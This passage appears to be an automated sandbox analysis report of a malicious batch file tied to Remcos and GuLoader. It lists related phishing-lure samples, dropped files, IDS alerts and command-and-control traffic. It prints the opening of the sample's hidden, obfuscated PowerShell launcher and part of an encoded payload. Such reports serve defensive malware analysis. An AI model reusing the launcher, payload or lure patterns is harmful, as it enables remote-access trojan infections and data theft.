                                                                                                DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Order.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUSTT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                • 188.114.96.3
                                                                                                https://freeaccessonline.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                • 104.17.25.14
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                • 104.21.53.8
                                                                                                PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                • 188.114.96.3
                                                                                                Quotation_final_buy_order_list_2024_po_nos_ART125673211020240000000000024.batGet hashmaliciousGuLoaderBrowse
                                                                                                • 188.114.96.3
                                                                                                TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                • 188.114.97.3
                                                                                                MDE_File_Sample_1a8e4ebbcc2e3f76efb2a55bb6179417263ebf3d.zipGet hashmaliciousUnknownBrowse
                                                                                                • 172.64.41.3
                                                                                                REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 188.114.96.3
                                                                                                MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 188.114.96.3
                                                                                                PaymentXConfirmationXcopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 188.114.96.3
                                                                                                ATOM86-ASATOM86NLDHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                • 85.222.236.220
                                                                                                DHL AWB_NO_92847309329.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                Order.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 178.237.33.50
                                                                                                1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                • 178.237.33.50
                                                                                                duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                                                                • 178.237.33.50
                                                                                                COGENT-174USPO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                • 38.88.82.56
                                                                                                la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                • 38.58.105.199
                                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                • 38.64.166.57
                                                                                                la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                • 154.22.18.20
                                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                • 149.100.195.183
                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                • 38.179.31.249
                                                                                                M3Llib2vh3.elfGet hashmaliciousMiraiBrowse
                                                                                                • 38.53.78.115
                                                                                                bin.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                • 199.99.120.181
                                                                                                0dWzJvs4ON.elfGet hashmaliciousMiraiBrowse
                                                                                                • 38.93.7.181
                                                                                                bin.armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 149.33.65.208

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0eQuotation_final_buy_order_list_2024_po_nos_ART125673211020240000000000024.batGet hashmaliciousGuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                • 104.21.56.189
                                                                                                REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.56.189
                                                                                                PO FOR CONNECTOR WITH TERMINAL.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                • 104.21.56.189
                                                                                                PO 0039499059996600 dtated 10222024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 104.21.56.189
                                                                                                Stima IMP87654 per l'esportazione dell'ultimo trimestre.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.56.189
                                                                                                rEXSP5634HISP9005STMSDSDOKUME74247linierelet.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                z1DHL_Shipping_.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                                • 104.21.56.189
                                                                                                37f463bf4616ecd445d4a1937da06e19TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                • 104.21.56.189
                                                                                                MDE_File_Sample_1a8e4ebbcc2e3f76efb2a55bb6179417263ebf3d.zipGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.56.189
                                                                                                rEXSP5634HISP9005STMSDSDOKUME74247linierelet.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                Reminder.exeGet hashmaliciousAmadeyBrowse
                                                                                                • 104.21.56.189
                                                                                                P4.exeGet hashmaliciousXRedBrowse
                                                                                                • 104.21.56.189
                                                                                                Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                Salary Revision_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                Ricevuta_di_pagamento.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                • 104.21.56.189
                                                                                                8VYDvQtXBH.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                • 104.21.56.189

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):957
                                                                                                Entropy (8bit):5.009232287567204
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:tkdGnd61GkMyGWKyGXPVGArwY3OHfv+oQasHuGHmArpv/mOAaNO+ao9W7iN5zzkr:qsdluKyGX85jHf3SvXhNlT3/7YvfbYro
                                                                                                MD5:097A4F4FAD24E3771DEF7A30207C7ACA
                                                                                                SHA1:261E2276DA9A35B6F01AC78CB096B30BCF795F97
                                                                                                SHA-256:032666ADE91EF58519500EF6C73723EAF1BDA14A796CF9D646B31C26AF9446B4
                                                                                                SHA-512:16EE192FB0B85A7982244E45C28338764249CF3618D80D88CB04B5FB4239E95B86D5B21388286FB5B1DE43E1D5227D5759D85A7D9E65CA4AEA03E01C999F5C27
                                                                                                Malicious:false
                                                                                                Preview:{. "geoplugin_request":"173.254.250.76",. "geoplugin_status":200,. "geoplugin_delay":"3ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):8003
                                                                                                Entropy (8bit):4.840877972214509
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                MD5:106D01F562D751E62B702803895E93E0
                                                                                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                Malicious:false
                                                                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n15klkbc.0e1.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s51vsxw5.5il.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuwvtkwx.eay.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwvawv05.mex.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\bhv6E57.tmp

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                File Type:Extensible storage user DataBase, version 0x620, checksum 0x5ad2f074, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):17301504
                                                                                                Entropy (8bit):1.0258660186081168
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:zvQXf7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqkoz:3yUt3F0TkT0TAitKxK9JdAE4AgC
                                                                                                MD5:0772451D34828FAC54B2A7B163043341
                                                                                                SHA1:00DB955F7E8A88DDBB8C2CAAC760A621A5F7D219
                                                                                                SHA-256:E0622604581DBC7EE2F30DDD810048C32D67185311BE7F612A95F29DE7E28F56
                                                                                                SHA-512:05ACDA4289D21F76F3B7DA156496E333FDF231757C259525B018B8BFDB4DA34E6FC510C8CE661B2FEBE1002F9C1E96BFC4F5FA4B8B33E8CCDAF02BAD005D4BB5
                                                                                                Malicious:false
                                                                                                Preview:Z..t... .......4.........gN;....{........................&....../...{..!(...|..h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{..................................|K.(!(...|..................3...!(...|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):2
                                                                                                Entropy (8bit):1.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Qn:Qn
                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                Malicious:false
                                                                                                Preview:..

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1H23IT04ZX4H4CJOLMTT.temp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6224
                                                                                                Entropy (8bit):3.7234688293946614
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:shhrD2lKtyH3CyXU2U2nukvhkvklCywM0OblvlHJLSogZoYUOblvlLLSogZo81:8oH3CvT1kvhkvCCtROblvyHOOblvIHT
                                                                                                MD5:CCF33094D958C06585B867596DFD7270
                                                                                                SHA1:DC385C564A84F21BCB51D4DAD452C6A02C85D34D
                                                                                                SHA-256:E707A95FABB205F221C4F506E33A8F0156D7499C69E5F49C9AA66C60690872BE
                                                                                                SHA-512:180444F7FDBF2F353C6337D6C18069FD63DC5AE6BB728365859A603A27D6449F0CF558E26974A52A40A3F2154AEAD4C5D67F6B7ACA0BB5636901654399632D57
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...J.S.......U$..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...Yc..U$..c...U$......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2VY.<...........................^.A.p.p.D.a.t.a...B.V.1.....VY.<..Roaming.@......EW<2VY.<..../......................S..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2VY.<....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2VY.<....2......................M].W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2VY.<....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2VY.<....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2VY.=....u...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6224
                                                                                                Entropy (8bit):3.7234688293946614
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:shhrD2lKtyH3CyXU2U2nukvhkvklCywM0OblvlHJLSogZoYUOblvlLLSogZo81:8oH3CvT1kvhkvCCtROblvyHOOblvIHT
                                                                                                MD5:CCF33094D958C06585B867596DFD7270
                                                                                                SHA1:DC385C564A84F21BCB51D4DAD452C6A02C85D34D
                                                                                                SHA-256:E707A95FABB205F221C4F506E33A8F0156D7499C69E5F49C9AA66C60690872BE
                                                                                                SHA-512:180444F7FDBF2F353C6337D6C18069FD63DC5AE6BB728365859A603A27D6449F0CF558E26974A52A40A3F2154AEAD4C5D67F6B7ACA0BB5636901654399632D57
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...J.S.......U$..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...Yc..U$..c...U$......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2VY.<...........................^.A.p.p.D.a.t.a...B.V.1.....VY.<..Roaming.@......EW<2VY.<..../......................S..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2VY.<....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2VY.<....2......................M].W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2VY.<....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2VY.<....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2VY.=....u...........

                                                                                                C:\Users\user\AppData\Roaming\Unslave.Mel

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):494580
                                                                                                Entropy (8bit):5.836154249707592
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:/QnkugcWPfbovD25yPJCXDIUAkTrqpUIcr9:/vugcWP8vDYOJmvSU79
                                                                                                MD5:39858943E5706782A2E5B0C5791511DE
                                                                                                SHA1:AC3BA663425EDCC14C79B58D933F6DD6AD46DEC4
                                                                                                SHA-256:1E187E2094F3AECA9A210E974CDDAF48521CED815F2127CAD6DF88FE1CB26F96
                                                                                                SHA-512:9C4BF3856AA9DEB997E390812711EF7091772DCD46594BD0F1FCFBDDD75FB68A6FFF2E8280335C3EA749F2CC0849A5274471E1DAA7E50B2587B8EEA41390184E
                                                                                                Malicious:false
                                                                                                Preview:cQGb6wJVs7s0PxcAcQGb6wJJwANcJATrAssWcQGbuZxuD0LrAgWt6wKYE4HpLMkH5XEBm3EBm4HBkFr4ousCVL9xAZtxAZtxAZu6SBA5HXEBm+sCG+txAZtxAZsxynEBm+sCncKJFAtxAZtxAZvR4nEBm3EBm4PBBHEBm+sCWHOB+YxDBQJ8zusCsDrrAhawi0QkBOsCOurrAmHVicNxAZvrAjIggcO71MMA6wJTIHEBm7pFO88o6wKGjXEBm4HCIPOg93EBm+sCTgiB6mUucCBxAZvrApfm6wIUNnEBm+sCmdzrAoOHiwwQcQGb6wJGsokME+sChdPrApcLQusCpJtxAZuB+rg0BQB103EBm3EBm4lcJAzrAjqF6wLRiYHtAAMAAHEBm+sCMx2LVCQI6wImHXEBm4t8JARxAZtxAZuJ6+sCClNxAZuBw5wAAADrAoG86wI7x1NxAZvrArtKakDrAgBe6wLB0Ynr6wLIjOsCeBDHgwABAAAAkB8CcQGb6wLlN4HDAAEAAOsCCL3rAvYcU3EBm3EBm4nrcQGb6wIhIYm7BAEAAHEBm+sCs8CBwwQBAABxAZvrAi4NU+sC6VzrAqsvav/rAhL86wJYMIPCBesC8OBxAZsx9nEBm3EBmzHJcQGb6wI4UIsa6wIVOHEBm0HrAhrA6wKyDjkcCnXy6wKu8+sC5JBG6wIpuHEBm4B8Cvu4ddvrAmly6wLv9ItECvzrAkOG6wItmSnwcQGbcQGb/9JxAZvrAqTaurg0BQBxAZvrAgWfMcDrAkdQ6wL+qIt8JAzrArnY6wIAjIE0B0diAZ3rAhsIcQGbg8AE6wJb/esC5G450HXj6wK8pOsCMQOJ++sClazrAmcU/9dxAZtxAZsh4/qsCYoBnUdiWhy5uG6VQlr9FKLrnMa4nf4mjhHnrMaR5/CxrIBu1eVz/caRvAcl/ShBzP9aYridVBSi2+F8LImAbAjSlSHDuIB0g7m4isaT8ugCIoFj

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:ASCII text, with very long lines (6231), with no line terminators
                                                                                                Entropy (8bit):5.328205534518685
                                                                                                TrID:
                                                                                                  File name:LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat
                                                                                                  File size:6'231 bytes
                                                                                                  MD5:79c452316f1b510462cf29f5fbbd84ba
                                                                                                  SHA1:2f95ab9367e8ef18427e2a8568afffbe0f197f22
                                                                                                  SHA256:4c697bdcbe64036ba8a79e587462960e856a37e3b8c94f9b3e7875aeb2f91959
                                                                                                  SHA512:9db2ed31b8fa24d38549707002fff53fc255630dca2b08c2c335816cabef1f57a4ab96fe01f41d65818a0cc58ecca770cb7c5697adbb65e3df53d7fe9f2c04e9
                                                                                                  SSDEEP:192:zQTm8sMkAEm+nTPTBylI9lCu8JHDyOrhZT:zQTxkllTPVmICu8YOtJ
                                                                                                  TLSH:35D14B08A9A627960EA63E846C47D4019F5D05967C6C90F2FBA48B8D3405F20FB7CFB5
                                                                                                  File Content Preview:start /min powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare

                                                                                                  File Icon

                                                                                                  Icon Hash:9686878b929a9886

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-10-22T09:40:36.573377+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649846104.21.56.189443TCP
                                                                                                  2024-10-22T09:40:42.309016+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649881143.244.46.15051525TCP
                                                                                                  2024-10-22T09:40:43.893685+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649893178.237.33.5080TCP
                                                                                                  2024-10-22T09:40:44.230804+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649892143.244.46.15051525TCP

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 22, 2024 09:40:04.112433910 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:04.112485886 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:04.112713099 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:04.121814966 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:04.121855021 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:04.756637096 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:04.756943941 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:04.766136885 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:04.766175985 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:04.766632080 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:04.773333073 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:04.815331936 CEST44349710104.21.56.189192.168.2.6
